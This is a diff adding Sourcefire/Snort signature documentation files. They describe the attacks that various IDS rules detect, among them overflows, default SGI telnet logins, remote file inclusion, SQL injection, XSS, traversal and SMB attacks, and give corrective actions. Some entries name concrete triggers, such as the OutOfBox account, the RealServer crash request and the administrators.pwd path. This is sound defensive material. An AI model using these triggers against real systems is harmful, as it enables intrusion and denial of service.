+This event is generated when an attempt is made to exploit a known vulnerability in NetWin WebNEWS.
+
+--
+Impact:
+Execution of arbitrary code. Possible unauthorized access to the target 
+host.
+
+--
+Detailed Information:
+WebNEWS allows access to news groups via a web interface. Certain 
+versions of the application suffer from a buffer overflow condition such
+that a user supplied group name longer than 1500 characters may allow 
+the attacker to execute code of his choosing with the privileges of the 
+user running the web server.
+
+--
+Affected Systems:
+	NetWin WebNEWS 1.1 j
+	NetWin WebNEWS 1.1 i
+	NetWin WebNEWS 1.1 h
+
+--
+Attack Scenarios:
+The attacker would need to supply a long news group name of over 1500 
+characters to cause the overflow which may then present the attacker 
+with the opportunity to execute code.
+
+--
+Ease of Attack:
+Moderate.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/710.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+710
+
+--
+Summary:
+This event is generated after an attempted login to a telnet server 
+using the username OutOfBox.
+
+--
+Impact:
+Unauthorized remote access.
+
+--
+Detailed Information:
+Some SGI machines are shipped with an easy setup group of scripts to
+assist the user when setting up the host. This group of programs is
+called EZsetup and may install some passwordless default accounts on the 
+machine.
+
+This event is generated when an attempt is made to login to a server
+using the username OutOfBox via Telnet. This is a default account on some
+SGI based machines. The password may also be OutOfBox or it may not have
+a password assigned.
+
+Repeated events from this rule may indicate a determined effort to guess
+the password for this account.
+
+--
+Affected Systems:
+	SGI Telnet servers.
+
+--
+Attack Scenarios:
+An attacker may attempt to connect to a telnet server using the username
+OutOfBox.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disable the OutOfBox account.
+
+Choose the most secure options when using EZsetup.
+
+Use ssh as an alternative to Telnet
+
+Block inbound telnet access if it is not required.
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/273.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+273
+
+--
+Summary:
+This event is generated when a remote attacker transmits fragmented IGMP packets with malformed headers to the internal network, indicating an IGMP Denial of Service (DoS) attack.
+
+--
+Impact:
+Denial of service.
+
+--
+Detailed Information:
+If an IGMP packet with a malformed header is transmitted to an unpatched Microsoft Windows computer, the computer may crash when it attempts to process the packet.  
+
+--
+Affected Systems:
+Microsoft Windows 95
+Microsoft Windows 98
+Microsoft Windows 98 SE
+Microsoft Windows NT 4
+
+--
+Attack Scenarios:
+An attacker sends fragmented IGMP packets with malformed headers to a target computer. If the computer is running an unpatched version of Windows, it may crash.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Install the latest patches available for your operating system. See http://www.microsoft.com/technet/security/bulletin/ms99-034.asp for more information.
+
+Implement a packet-filtering firewall to block inappropriate traffic to the network.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Sourcefire Technical Publications Team
+Jen Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/514
+
+Microsoft
+http://www.microsoft.com/technet/security/bulletin/ms99-034.asp
+
+--
--- /dev/null
+++ b/doc/signatures/389.txt
@@ -0,0 +1,56 @@
+Rule:
+
+--
+
+Sid:
+389
+
+--
+
+Summary:
+This event is generated when an ICMP Address Mask Request message is found on the network with an invalid ICMP Code.  ICMP Address Mask Requests are used for automatically determining the 32-bit subnet mask for the network.  RFC 950 definesthe Code for ICMP Type 17 datagram to be 0, if this field is not 0 it could be an indication of an attack attempt.
+
+--
+
+Impact:
+Attacks may use an ICMP address Mask Request to determine the subnet mask of the network.  This information can be used to help develope a network diagram in lue of more focused attacks.
+--
+
+Detailed Information:
+ICMP Address Mask Requests are defined in RFC 950 as the third method hosts may support for determing the address mask correspoding to its IP address.  In most implementations this method is not supported, and should not be normal traffic on most networks.  
+
+--
+
+Attack Scenarios:
+Attackers may use this ICMP Type to gather information about the subnet masks of a given network subnet.
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate ICMP Address Mask Requests.
+--
+
+False Positives:
+None known.  ICMP Type 17 datagrams should never be generated with a code other than 0.
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+ICMP Type 17 should be blocked at the upstream firewall.  This type of ICMP request should never originate from a host outside of the protected network.
+--
+
+Contributors:
+Original Rule wirter unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+None
+
+
+--
--- /dev/null
+++ b/doc/signatures/100000680.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000680
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Harpia" application running on a webserver. 
+Access to the file "search.php" using a remote file being passed as the 
+"header_prog" parameter may indicate that an exploitation attempt has been 
+attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "header_prog" parameter in the "search.php" script used 
+by the "Harpia" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Harpia
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/2324.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+2324
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in Virtual Programming VP-ASP web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in Virtual Programming VP-ASP web application running on a
+server. It may be possible to use SQL injection techniques to supply
+SQL code of an attackers choosing to the database used in the
+application.
+
+--
+Affected Systems:
+	Virtual Programming VP-ASP 4.0
+	Virtual Programming VP-ASP 5.0
+
+--
+Attack Scenarios:
+An attacker can inject SQL code of their choosing to view and manipulate
+data stored in the underlying database used by the application.
+
+--
+Ease of Attack:
+Simple. Exploit software is not required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2574.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2574
+
+--
+Summary:
+This event is generated when a remote attacker attempts to exploit a 
+format string vulnerability against an FTP server during authentication.
+
+--
+
+Impact:
+Attempted Admin.  A successful format string attack could result in the
+execution of arbitrary code with the same privileges as the user running
+the FTP daemon.
+
+--
+
+Detailed Information:
+Several FTP daemons are vulnerable to format string exploits during
+authentication to the FTP server.  A successful exploit attempt could 
+result in the remote attacker gaining unauthorized root access to the 
+vulnerable system.
+
+--
+Affected Systems:
+	BolinTech Dream FTP Server version 1.02
+
+--
+
+Attack Scenarios:
+A remote attacker could use a publicly available script to exploit the 
+vulnerability an gain control of the target host.
+
+--
+
+Ease of Attack:
+Simple. Numerous attack scripts exist to exploit this vulnerabiliy.
+
+--
+
+False Positives:
+None known.
+
+--
+
+False Negatives:
+None known.
+
+--
+
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000366.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000366
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "phpNuke" application running on a webserver. Access to the file "admin_ug_auth.php" using a remote file being passed as the "phpbb_root_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "phpbb_root_path" parameter in the "admin_ug_auth.php" script used by the "phpNuke" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using phpNuke
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/100000699.txt
@@ -0,0 +1,56 @@
+
+
+Rule:
+
+--
+Sid:
+100000699
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site scripting vulnerability in the "Vincent Leclercq News" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site scripting vulnerability via the "id" parameter in the "diver.php" script used by the "Vincent Leclercq News" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to retrieve sensitive data, execute system binaries or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using Vincent Leclercq News
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/100000683.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+100000683
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "cPanel" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "file" parameter in the "select.html" script 
+used by the "cPanel" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using cPanel
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/1522.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1522
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1411.txt
@@ -0,0 +1,78 @@
+Rule:
+
+--
+Sid:
+1411
+
+--
+
+Summary:
+This event is generated when an SNMP connection over UDP using the 
+default 'public' community is made.
+
+--
+
+Impact:
+Information gathering
+
+--
+
+Detailed Information:
+SNMP (Simple Network Management Protocol) v1 uses communities and IP 
+addresses to authenticate communication between the SNMP client and SNMP
+daemon. Many SNMP implementations come pre-configured with 'public' and 
+'public' communities. If these are not disabled, the attacker can 
+gather a great deal of information about the device running the SNMP 
+daemon.
+
+--
+
+Affected Systems:
+Devices running SNMP daemons with 'public' community enabled.
+
+--
+
+Attack Scenarios:
+An attacker scans a range of IPs for SNMP servers having the 'public' 
+community set and gathers information about the hosts.
+
+--
+
+Ease of Attack:
+Simple.
+
+--
+
+False Positives:
+None known.
+
+--
+
+False Negatives:
+None known.
+
+--
+
+Corrective Action:
+Disable the 'public' and 'private' communities before connecting the 
+device with SNMP on the Internet or block access to SNMP ports using a 
+packet filtering firewall for unauthorized addresses.
+
+--
+
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Chaos <c@aufbix.org>
+
+-- 
+
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0013
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0012
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0517
+
+--
--- /dev/null
+++ b/doc/signatures/900.txt
@@ -0,0 +1,64 @@
+Rule:  
+
+--
+Sid:
+900
+
+--
+Summary:
+This event is generated when an attempt is made to execute a directory
+traversal attack.
+
+--
+Impact:
+Information disclosure. This is a directory traversal attempt which can
+lead to information disclosure and possible exposure of sensitive
+system information.
+
+--
+Detailed Information:
+Directory traversal attacks usually target web, web applications and ftp
+servers that do not correctly check the path to a file when requested by
+the client.
+
+This can lead to the disclosure of sensitive system information which may
+be used by an attacker to further compromise the system.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An authorized user or anonymous user can use the directory traversal 
+technique, to browse folders outside the ftp root directory. Information
+gathered may be used in further attacks against the host.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade the software to the latest non-affected version.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/1765.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1765
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3073.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+3073
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer
+overflow associated with the several commands of an IMAP service. This
+event is concerned with data supplied as a parameter to the
+"subscribe" command.
+
+--
+Impact:
+A successful attack may cause a denial of service or a buffer overflow
+and the subsequent execution of arbitrary code on a vulnerable server.
+
+--
+Detailed Information:
+This event is generated when excess data is detected in an IMAP command.
+Some IMAP implementations exhibit programming errors that can lead to a
+buffer overflow condition when excess data is supplied to a static
+buffer.
+
+A vulnerability exists in the way that the Mercury Mail IMAP service
+handles several commands.  An excessively long command argument can
+trigger a denial of service or a buffer overflow and the subsequent
+execution of arbitrary code on a vulnerable server.
+
+--
+Affected Systems:
+	Pegasus Mail Mercury Mail Transport System 3.32
+	Pegasus Mail Mercury Mail Transport System 4.01a
+
+--
+Attack Scenarios:
+An attacker can supplied an overly long command, causing denial of
+service or a buffer overflow.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell<bmc@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2065.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+2065
+
+--
+Summary:
+file on a Lotus Domino Server.
+
+--
+Impact:
+Information disclosure
+
+--
+Detailed Information:
+Certain versions of Lotus Domino web servers do not correctly handle 
+requests for script files not specific to Lotus Domino.
+
+By using a dot in the filename an attacker may view the source of the 
+script and be presented with sensitive information embedded in the 
+script.
+
+--
+Affected Systems:
+Lotus Domino Server 5.0 and 6.0
+
+--
+Attack Scenarios:
+The attacker merely needs to make an HTTP request for the script and add
+a dot to the filename. This can be done using a browser.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Apply the appropriate vendor fixes
+
+Upgrade to the latest non-affected version of the software
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/6841
+
+--
--- /dev/null
+++ b/doc/signatures/1331.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+1331
+
+--
+Summary:
+Attempted uname command access via web
+
+--
+Impact:
+Attempt to gain information on the host operating system using the uname
+command.
+
+--
+Detailed Information:
+This is an attempt to gain intelligence about the operating system being
+used on a webserver. uname is a UNIX command that will return
+information about the operating system, the machine's architecture, the
+processor architecture and the version level of the software being used.
+This information is valuable to an attacker who can use it to plan
+further attacks based on possible vulnerabilities in the machine's
+operating system.
+
+Using "uname -a", the attackers might be able to gain accurate
+intelligence on the web server platform. The rule looks for the "uname"
+command in the URL part of the client to web server connection and does
+not indicate whether the command was actually successful in showing the
+system information. The presence of the "uname" command in the URL
+indicates that an attacker attempted to trick the web server into
+executing system commands in non-interactive mode i.e. without a valid
+shell session. Another case when this rule might trigger is unencrypted
+HTTP tunneling connection to the server.
+
+--
+Attack Scenarios:
+The attacker can make a standard HTTP request that contains 'uname' in
+the URI which can then return the machine's operating system environment
+architecture.
+
+--
+Ease of Attack:
+Simple HTTP request.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Webservers should not be allowed to view or execute files and binaries
+outside of it's designated web root or cgi-bin. This command may also be
+requested on a command line should the attacker gain access to the machine. 
+
+--
+Contributors:
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Additional information from Anton Chuvakin <http://www.chuvakin.org>
+
+-- 
+Additional References:
+
+man uname
+
+--
--- /dev/null
+++ b/doc/signatures/1957.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+1957
+
+--
+Summary:
+This event is generated when an attempt is made to ping the Remote Procedure Call (RPC) sadmind.
+
+
+--
+Impact:
+Intelligence gathering activity.  The sadmind ping will verify if the daemon is running.
+
+--
+Detailed Information:
+The sadmind RPC service is used by Solaris Solstice AdminSuite applications to perform remote distributed system administration tasks such as adding new users.  The ping function associated with the sadmind daemon will verify if it is active. 
+
+--
+Affected Systems:
+All systems running sadmind.
+
+--
+Attack Scenarios:
+An attacker can ping the sadmind daemon to verify if it is active.  There are several exploits associated with this daemon.
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/866
+
+--
--- /dev/null
+++ b/doc/signatures/2944.txt
@@ -0,0 +1,66 @@
+Rule:
+
+--
+Sid:
+2944
+
+--
+Summary:
+This event is generated when an attempt is made to shutdown a Windows
+system via SMB. 
+
+--
+Impact:
+Serious.
+
+--
+Detailed Information:
+This event indicates that an attempt was made to shutdown a Windows
+system via SMB across the network.
+
+It may be possible for an attacker to manipulate a Windows system
+from a remote location. Shutting down a system may lead to a Denial of
+Service for the target host.
+
+--
+Affected Systems:
+	Microsoft Windows systems.
+
+--
+Attack Scenarios:
+An attacker may be able to manipulate a target system using SMB. The
+attacker may gain complete control over the affected system.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the host for signs of system compromise.
+
+Turn off file and print sharing on the target host.
+
+Use a packet filtering firewall to disallow SMB access to the host from
+sources external to the protected network.
+
+Disallow remote registry manipulation.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/276.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+276
+
+--
+Summary:
+This event is generated when a remote attacker transmits a malformed 
+request for a page on a RealNetworks RealServer port, which can indicate
+a Denial of Service (DoS) attack on the RealServer.
+
+--
+Impact:
+The RealNetworks RealServer service will crash.
+
+--
+Detailed Information:
+RealNetworks RealServer is a server application that serves streaming 
+audio to clients. When an attacker sends a request for a template file 
+in the /viewsource/ directory with an empty variable value, RealServer 
+crashes.   
+
+--
+Affected Systems:
+Systems running RealNetworks RealServer 7.0 with View Source 
+functionality enabled.
+
+--
+Attack Scenarios:
+An attacker sends an HTTP request for /viewsource/template.html? on a 
+RealServer audio server. RealServer crashes, stopping audio 
+transmission.
+
+--
+Ease of Attack:
+Simple. 
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest version of the software or disable the View Source 
+functionality. The vendor has issued an advisory, workarounds, and 
+downloadable patches at http://service.real.com/help/faq/servgviewsrc.html.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Sourcefire Technical Publications Team
+Jen Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+
+RealNetworks
+http://service.real.com/help/faq/servgviewsrc.html
+
+
+--
--- /dev/null
+++ b/doc/signatures/3135.txt
@@ -0,0 +1,77 @@
+Rule: 
+
+--
+Sid: 
+3135
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft systems using Server Message Block (SMB).
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+SMB is a client - server protocol used in sharing resources such as
+files, printers, ports, named pipes and other things, between machines
+on a network.
+
+A vulnerability in the Microsoft implementation of SMB exists due to a
+programming error which may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain unauthorized access to the target host.
+
+A malicious attacker can exploit the vulnerability by sending a
+malicious response from a server in response to a client request using
+SMB.
+
+--
+Affected Systems:
+	Microsoft Windows 2003
+	Microsoft Windows 2000
+	Microsoft Windows XP
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message from the server
+containing code of their choosing to be run on the client.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+Turn off windows file and print services.
+
+Use Samba as an alternative.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+eEye:
+http://www.eeye.com/html/research/advisories/AD20050208.html
+
+--
--- /dev/null
+++ b/doc/signatures/953.txt
@@ -0,0 +1,80 @@
+Rule:
+
+--
+Sid:
+953
+
+--
+
+Summary:
+This event is generated when an attempt is made to access a file with 
+Microsoft Personal Server administration information.
+
+--
+
+Impact:
+If successful, the attacker can log into the system and modify web 
+content, as well as modify other users' credentials.
+
+--
+
+Detailed Information:
+On systems running Microsoft Personal Web Server the file 
+administrators.pwd contains usernames and encrypted passwords for users 
+who can author contents and administer this server. The attacker can 
+guess the exact URL of this file and request it, hence gaining this 
+information.
+
+--
+
+Affected Systems:
+Certain versions of Microsoft Windows 95 or Windows 98 running Frontpage
+1.1 or Frontpage 98 Server Extensions. Windows NT installations are not 
+affected.
+
+--
+
+Attack Scenarios:
+An attacker can request the file from its standard location, entering 
+the exact URL, and gain access to the system after cracking the 
+passwords found in the file.
+
+--
+
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+
+False Positives:
+None known.
+
+--
+
+False Negatives:
+None known.
+
+--
+
+Corrective Action:
+Disable the Personal Web Server.
+
+--
+
+Contributors:
+Original Rule Writer Unknown
+Snort documentation contributed by Chaos <c@aufbix.org>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/1205/info/
+
+
+
+
+--
--- /dev/null
+++ b/doc/signatures/1846.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+1846
+
+--
+Summary:
+This event is generated when network traffic indicating the use of an
+application or service that may violate a corporate security policy.
+
+--
+Impact:
+This may be a violation of corporate policy since some applications can
+be used to bypass security measures designed to restrict the flow of
+corporate information to destinations external to the corporation. In
